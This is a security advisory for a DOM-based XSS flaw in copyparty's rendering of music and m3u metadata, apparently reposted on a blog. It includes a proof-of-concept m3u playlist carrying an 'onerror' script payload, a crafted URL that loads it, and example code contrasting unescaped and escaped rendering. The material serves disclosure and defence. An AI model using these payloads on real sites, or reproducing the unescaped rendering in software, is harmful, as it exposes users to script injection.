copyparty has DOM-Based XSS vulnerability when displaying multimedia metadata

Link: https://github.com/advisories/GHSA-9q4r-x2hj-jmvr

Repository stars: 5260

CVSS score: 5.4

References:

Description:

Summary

An unauthenticated attacker is able to execute arbitrary JavaScript code in a victim’s browser due to improper sanitization of multimedia tags in music files, including m3u files.

Details

Multimedia metadata is rendered in the web-app without sanitization. This can be exploited in two ways:

  • a user who has the necessary permission to upload files can upload a song with an artist name such as <img src=x onerror=alert(document.domain)>
  • an unauthenticated user can trick another user into clicking a malicious URL, performing this same exploit using an externally-hosted m3u file

The CVE score and PoC are based on the m3u approach, which results in a higher severity.

PoC

  1. Create a file named song.m3u with the following content. Host this file on an attacker-controlled web server.

    #EXTM3U
    #EXTINF:1,"><img src=x onerror=alert(document.domain)> - "><img src=x onerror=alert(document.domain)>
    http://example.com/audio.mp3
  2. Craft and share the malicious URL:

    http://127.0.0.1:3923/#m3u=https://example.com/song.m3u

Impact

Any user that accesses this malicious URL is impacted.
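
The rendering flaw described under Details and its mitigation at the output boundary, as an added example (not copyparty's code or its actual patch): it parses the PoC playlist and builds the track markup with and without HTML escaping. The names parseM3u, esc, renderUnsafe and renderSafe and the <li> markup are assumptions made for illustration.

```javascript
// Added example; not copyparty's code. All function names are hypothetical.

// Constructed sample: the playlist from the PoC above.
const SAMPLE_M3U = [
  '#EXTM3U',
  '#EXTINF:1,"><img src=x onerror=alert(document.domain)> - "><img src=x onerror=alert(document.domain)>',
  'http://example.com/audio.mp3',
].join('\n');

// Parse "#EXTINF:<seconds>,<artist> - <title>" followed by a URL line.
function parseM3u(text) {
  const tracks = [];
  let meta = null;
  for (const raw of text.split(/\r?\n/)) {
    const line = raw.trim();
    const m = /^#EXTINF:(-?\d+(?:\.\d+)?),(.*)$/.exec(line);
    if (m) {
      const sep = m[2].indexOf(' - ');
      meta = sep < 0
        ? { artist: '', title: m[2] }
        : { artist: m[2].slice(0, sep), title: m[2].slice(sep + 3) };
    } else if (line && !line.startsWith('#')) {
      tracks.push({ url: line, ...(meta || { artist: '', title: line }) });
      meta = null;
    }
  }
  return tracks;
}

// HTML-escape for both element content and quoted attribute values.
const ESC = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };
const esc = (s) => String(s).replace(/[&<>"']/g, (c) => ESC[c]);

// Vulnerable pattern: playlist-controlled strings concatenated into markup.
const renderUnsafe = (t) =>
  `<li title="${t.artist}"><b>${t.artist}</b> ${t.title}</li>`;

// Hardened: every untrusted field is escaped where it enters the markup.
const renderSafe = (t) =>
  `<li title="${esc(t.artist)}"><b>${esc(t.artist)}</b> ${esc(t.title)}</li>`;

// In a browser, assigning el.textContent = t.artist avoids HTML parsing entirely.
```
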


http://example.com/2025/07/28/github_2319842536/
Author
lianccc
Published on
July 28, 2025